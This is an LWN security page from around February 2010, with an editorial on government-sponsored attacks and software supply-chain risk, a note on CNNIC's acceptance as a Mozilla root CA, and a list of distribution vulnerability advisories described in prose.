Security
Security in the 20-teens
Recently, Google announced that its operations in China (and beyond) had been subject to sophisticated attacks, some of which were successful; a number of other companies have been attacked as well. The source of these attacks may never be proved, but it is widely assumed that they were carried out by government agencies. There are also allegations that the East Anglia email leak was a government-sponsored operation. While at LCA, your editor talked with a developer who has recently found himself at Google; according to this developer, incidents like these demonstrate that the security game has changed in significant ways, with implications that the community can ignore only at its peril.Whenever one talks about security, one must do so in the context of a specific threat model: what are we trying to defend ourselves against? Different threat models lead to very different conclusions. For years, one of the most pressing threats has been script kiddies and others using well-known vulnerabilities to break into systems; initially these breakins were mostly for fun, but, over time, these attackers have increasingly had commercial motivations. In response, Linux distributors have created reasonably secure-by-default installations and effective mechanisms for the distribution of updates. As a result, we are, by default, quite well defended against this class of attack when carried out remotely, and moderately well defended against canned local attacks.
Attackers with more determination and focus are harder to defend against; somebody who intends to break into a specific system in pursuit of a well-defined goal has a better chance of success. Chances are, only the most hardened of systems can stand up against focused attackers with local access. When these attackers are at the far end of a network connection, we still stand a reasonable chance of keeping them out.
Often, those concerned with security simply throw up their hands when confronted with the problem of defending a system against an attacker who is working with the resources available to national governments. Most of us assume that we'll not be confronted with such an attack, and that there's little that we could do about one if we were. When governmental attackers can obtain physical access, there probably is little to be done, but remote (foreign) governmental attackers may not be able to gain that sort of access.
[PULL QUOTE: What the attacks on Google (and others) tell us is that we've now entered an era where we need to be concerned about attacks from national governments. END QUOTE] What the attacks on Google (and others) tell us is that we've now entered an era where we need to be concerned about attacks from national governments. Probably we have been in such an epoch for a while now, but the situation has become increasingly clear. Thinking about the implications would make some sense.
A look at updates from distributors shows that we still have have a steady stream of vulnerabilities in image processing libraries, PDF viewers, Flash players, and more. Some of these problems (yet another PNG buffer overflow, say) appear to have a relatively low priority, but they shouldn't. Media-based attacks can only become more common over time; it's easy to get a victim to look at a file or go to a specific web page. Properly targeted phishing (easily done by a national government) may be the method of choice for compromising specific systems for some time to come. Browsers, file viewers, and media players will play an unfortunate role in the compromise of many systems.
What may be even more worrisome, though, is the threat of back doors, trojan horses, or (perhaps most likely) subtle vulnerabilities inserted into our software development and distribution channels. This could happen at just about any stage in the chain.
On the development side, we like to think that code review would find deliberately coded security weaknesses. But consider this: kernel code tends to be reviewed more heavily than code in many other widely-used programs, and core kernel code gets more review than driver code. But none of that was able to prevent the vmsplice() vulnerability - caused by a beginner-level programming error - from getting into the mainline kernel. Many more subtle bugs are merged in every development cycle. We can't ever catch them all; what are our chances against a deliberately-inserted, carefully-hidden hole?
Source code management has gotten more robust in recent years; the widespread use of tools like git and mercurial effectively guarantees that an attempt to corrupt a repository somewhere will be detected. But that nice assumption only holds true for as long as one assumes that the hash algorithms used to identify commits are not subject to brute-force collisions. One should be careful about such assumptions when the computing resources of a national government can be brought to bear. We might still detect an attempt to exploit a hash collision - but our chances are not as good.
In any case, the software that ends up on our systems does not come directly from the source repositories; distributors apply changes of their own and build binary packages from that source. The building of packages is, one hopes, relatively robust; distributors have invested some significant resources into package signing and verification mechanisms. The Fedora and Red Hat intrusions show that this link in the chain is indeed subject to attack, but it is probably not one of the weakest links.
A weaker point may be the source trees found on developer laptops and the patches that those developers apply. A compromise of the right developer's system could render the entire signing mechanism moot; it will just sign code which has already been corrupted. Community distributions, which (presumably) have weaker controls, could be especially vulnerable to this attack vector. In that context, it's worth bearing in mind that distributions like Debian and Gentoo - at least - are extensively used in a number of sensitive environments. Enterprise distributions might be better defended against the injection of unwanted code, but the payback for the insertion of a hole into an enterprise distribution could be high. Users of community rebuilds of enterprise distributions (LWN being one of those) should bear in mind that they have added one more link to the chain of security that they depend on.
Then again, all of that may be unnecessary; perhaps ordinary bugs are enough to open our systems to sufficiently determined attackers. We certainly have no shortage of them. One assumes that no self-respecting, well-funded governmental operation would be without a list of undisclosed vulnerabilities close at hand. They have the resources to look for unknown bugs, to purchase the information from black-hat crackers, and to develop better static analysis tools than we have.
All told, it is a scary situation, one which requires that we rethink the security of our systems and processes from one end to the other. Otherwise we risk becoming increasingly vulnerable to well-funded attackers. We also risk misguided and destructive attempts to secure the net through heavy-handed regulation; see this ZDNet article for a somewhat confusing view of how that could come about.
The challenge is daunting, and it may be insurmountable. But, then, we as a community have overcome many other challenges that the world thought we would never get past, and the attacks seem destined to happen regardless of whether we try to improve our defenses. If we could achieve a higher level of security while preserving the openness of our community and the vitality of our development process, Linux would be even closer to World Domination than it is now. Even in the absence of other minor concerns - freedom, the preservation of fundamental civil rights, and the preservation of an open network, for example - this goal would be worth pursuing.
Brief items
China Internet Network Information Center accepted as a Mozilla root CA
Those who are concerned about the security of Mozilla's SSL certificate validation might want to take a look at this bugzilla entry. It seems that, at the end of October, Mozilla approved the addition of the China Internet Network Information Center (CNNIC) as a root certification authority, meaning that Firefox will accept CNNIC-signed certificates as valid and fully trusted. CNNIC is said to be controlled by the Chinese government and is alleged to be heavily involved in spying on Chinese citizens; numerous people are concerned that it will use its root CA position to facilitate man-in-the-middle attacks. Unfortunately, most of these concerns were not raised during the discussion period, making the removal of CNNIC - if warranted - harder.
Security reports
Two information leak vulnerabilities in Bugzilla
The Bugzilla project is reporting two information leaks that could lead to the disclosure of sensitive data. Several directories (CVS/, contrib/, docs/en/xml/, and t/) and the old-params.txt file were not restricted from being served by Bugzilla. By default, they do not contain sensitive information, but custom installations may have added files with passwords or other information. Also, certain bugs could be made public, at least briefly, when they were moved to a different product. Versions 3.0.11, 3.2.6, 3.4.5, and 3.5.3 have been released to address the leaks. Click below for the full announcement.
New vulnerabilities
bltk: privilege escalation
| Package(s): | bltk | CVE #(s): | |||||||||
| Created: | January 29, 2010 | Updated: | February 19, 2010 | ||||||||
| Description: | From the Fedora advisory: bltk will run any command as root | ||||||||||
| Alerts: |
| ||||||||||
hybserv: denial of service
| Package(s): | hybserv | CVE #(s): | CVE-2010-0303 | ||||
| Created: | January 29, 2010 | Updated: | February 3, 2010 | ||||
| Description: | From the Debian advisory: Julien Cristau discovered that hybserv, a daemon running IRC services for IRCD-Hybrid, is prone to a denial of service attack via the commands option. | ||||||
| Alerts: |
| ||||||
ircd-hybrid/ircd-ratbox: multiple vulnerabilities
| Package(s): | ircd-hybrid/ircd-ratbox | CVE #(s): | CVE-2009-4016 CVE-2010-0300 | ||||||||||||
| Created: | January 28, 2010 | Updated: | June 9, 2010 | ||||||||||||
| Description: | From the Debian alert:
David Leadbeater discovered an integer underflow that could be triggered via the LINKS command and can lead to a denial of service or the execution of arbitrary code (CVE-2009-4016). This issue affects both, ircd-hybrid and ircd-ratbox. It was discovered that the ratbox IRC server is prone to a denial of service attack via the HELP command. The ircd-hybrid package is not vulnerable to this issue (CVE-2010-0300). | ||||||||||||||
| Alerts: |
| ||||||||||||||
kernel: insecure devtmpfs permissions
| Package(s): | kernel | CVE #(s): | CVE-2010-0299 | ||||||||
| Created: | February 1, 2010 | Updated: | February 8, 2010 | ||||||||
| Description: | From the Mandriva advisory: An issue was discovered in 2.6.32.x kernels, which sets unsecure permission for devtmpfs file system by default. (CVE-2010-0299) | ||||||||||
| Alerts: |
| ||||||||||
kernel: arbitrary code execution
| Package(s): | kernel | CVE #(s): | CVE-2009-1385 | ||||
| Created: | February 3, 2010 | Updated: | February 3, 2010 | ||||
| Description: | From the Red Hat advisory: A flaw was found in the Intel PRO/1000 Linux driver (e1000) in the Linux kernel. Frames with sizes near the MTU of an interface may be split across multiple hardware receive descriptors. Receipt of such a frame could leak through a validation check, leading to a corruption of the length check. A remote attacker could use this flaw to send a specially-crafted packet that would cause a denial of service or code execution. (CVE-2009-1385, Important) | ||||||
| Alerts: |
| ||||||
lighttpd: denial of service
| Package(s): | lighttpd | CVE #(s): | CVE-2010-0295 | ||||||||||||||||||||
| Created: | February 2, 2010 | Updated: | June 3, 2010 | ||||||||||||||||||||
| Description: | From the Debian advisory: Li Ming discovered that lighttpd, a small and fast webserver with minimal memory footprint, is vulnerable to a denial of service attack due to bad memory handling. Slowly sending very small chunks of request data causes lighttpd to allocate new buffers for each read instead of appending to old ones. An attacker can abuse this behaviour to cause denial of service conditions due to memory exhaustion. | ||||||||||||||||||||||
| Alerts: |
| ||||||||||||||||||||||
maildrop: privilege escalation
| Package(s): | maildrop | CVE #(s): | CVE-2010-0301 | ||||||||||||||||||||||||
| Created: | January 28, 2010 | Updated: | September 7, 2010 | ||||||||||||||||||||||||
| Description: | From the Debian alert:
Christoph Anton Mitterer discovered that maildrop, a mail delivery agent with filtering abilities, is prone to a privilege escalation issue that grants a user root group privileges. | ||||||||||||||||||||||||||
| Alerts: |
| ||||||||||||||||||||||||||
moodle: multiple vulnerabilities
| Package(s): | moodle | CVE #(s): | CVE-2009-4297 CVE-2009-4298 CVE-2009-4299 CVE-2009-4301 CVE-2009-4302 CVE-2009-4303 CVE-2009-4305 | ||||||||
| Created: | February 3, 2010 | Updated: | February 16, 2010 | ||||||||
| Description: | From the Debian advisory: CVE-2009-4297: Multiple cross-site request forgery (CSRF) vulnerabilities have been discovered. CVE-2009-4298: It has been discovered that the LAMS module is prone to the disclosure of user account information. CVE-2009-4299: The Glossary module has an insufficient access control mechanism. CVE-2009-4301: Moodle does not properly check permissions when the MNET service is enabled, which allows remote authenticated servers to execute arbitrary MNET functions. CVE-2009-4302: The login/index_form.html page links to an HTTP page instead of using an SSL secured connection. CVE-2009-4303: Moodle stores sensitive data in backup files, which might make it possible for attackers to obtain them. CVE-2009-4305: It has been discovered that the SCORM module is prone to an SQL injection. Additionally, an SQL injection in the update_record function, a problem with symbolic links and a verification problem with Glossary, database and forum ratings have been fixed. | ||||||||||
| Alerts: |
| ||||||||||
ncpfs: privilege escalation
| Package(s): | ncpfs | CVE #(s): | CVE-2009-3297 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Created: | January 28, 2010 | Updated: | March 1, 2011 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Description: | From the Red Hat bugzilla entry: Ronald Volgers found a race condition in the samba-client's mount.cifs utility. Local, unprivileged user could use this flaw to conduct symlink attacks, leading to disclosure of sensitive information, or, possibly to privilege escalation. | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Alerts: |
| ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
mysql: access restriction bypass
| Package(s): | mysql | CVE #(s): | CVE-2008-7247 | ||||||||||||||||||||||||||||||||||||||||||||
| Created: | February 2, 2010 | Updated: | November 16, 2010 | ||||||||||||||||||||||||||||||||||||||||||||
| Description: | From the CVE entry:
sql/sql_table.cc in MySQL 5.0.x through 5.0.88, 5.1.x through 5.1.41, and 6.0 before 6.0.9-alpha, when the data home directory contains a symlink to a different filesystem, allows remote authenticated users to bypass intended access restrictions by calling CREATE TABLE with a (1) DATA DIRECTORY or (2) INDEX DIRECTORY argument referring to a subdirectory that requires following this symlink. | ||||||||||||||||||||||||||||||||||||||||||||||
| Alerts: |
| ||||||||||||||||||||||||||||||||||||||||||||||
postgresql: denial of service
| Package(s): | postgresql-server | CVE #(s): | CVE-2010-0442 | ||||||||||||||||||||||||||||||||||||||||||||
| Created: | February 3, 2010 | Updated: | May 28, 2010 | ||||||||||||||||||||||||||||||||||||||||||||
| Description: | From the NVD entry: The bitsubstr function in backend/utils/adt/varbit.c in PostgreSQL 8.0.23, 8.1.11, and 8.3.8 allows remote authenticated users to cause a denial of service (daemon crash) or have unspecified other impact via vectors involving a negative integer in the third argument, as demonstrated by a SELECT statement that contains a call to the substring function for a bit string, related to an "overflow." | ||||||||||||||||||||||||||||||||||||||||||||||
| Alerts: |
| ||||||||||||||||||||||||||||||||||||||||||||||
rootcerts: upgrade to latest certdata.txt
| Package(s): | rootcerts | CVE #(s): | |||||||||
| Created: | January 29, 2010 | Updated: | February 4, 2010 | ||||||||
| Description: | From the Mandriva advisory:
The rootcerts package was added in Mandriva in 2005 and was meant to be updated when necessary. The provided rootcerts packages has been upgraded using the latest certdata.txt file from the mozilla cvs repository, as of 2009/12/03. | ||||||||||
| Alerts: |
| ||||||||||
roundcubemail: information disclosure
| Package(s): | roundcubemail | CVE #(s): | CVE-2010-0464 | ||||||||||||
| Created: | February 3, 2010 | Updated: | February 25, 2010 | ||||||||||||
| Description: | From the Red Hat bugzilla entry: Roundcube 0.3.1 and earlier does not request that the web browser avoid DNS prefetching of domain names contained in e-mail messages, which makes it easier for remote attackers to determine the network location of the webmail user by logging DNS requests. | ||||||||||||||
| Alerts: |
| ||||||||||||||
wireshark: multiple vulnerabilities
| Package(s): | wireshark | CVE #(s): | CVE-2009-4337 CVE-2010-0304 | ||||||||||||||||||||||||||||||||
| Created: | February 1, 2010 | Updated: | May 28, 2010 | ||||||||||||||||||||||||||||||||
| Description: | From the Debian advisory: CVE-2009-4337: A NULL pointer dereference was found in the SMB/SMB2 dissectors. CVE-2010-0304: Several buffer overflows were found in the LWRES dissector. | ||||||||||||||||||||||||||||||||||
| Alerts: |
| ||||||||||||||||||||||||||||||||||
zabbix: multiple vulnerabilities
| Package(s): | zabbix | CVE #(s): | CVE-2009-4499 CVE-2009-4501 | ||||||||
| Created: | January 28, 2010 | Updated: | February 3, 2010 | ||||||||
| Description: | From the CVE entry for CVE-2009-4499:
SQL injection vulnerability in the get_history_lastid function in the nodewatcher component in Zabbix Server before 1.6.8 allows remote attackers to execute arbitrary SQL commands via a crafted request, possibly related to the send_history_last_id function in zabbix_server/trapper/nodehistory.c. From the CVE entry for CVE-2009-4501: The zbx_get_next_field function in libs/zbxcommon/str.c in Zabbix Server before 1.6.8 allows remote attackers to cause a denial of service (crash) via a request that lacks expected separators, which triggers a NULL pointer dereference, as demonstrated using the Command keyword. | ||||||||||
| Alerts: |
| ||||||||||
Page editor: Jake Edge
Next page:
Kernel development>>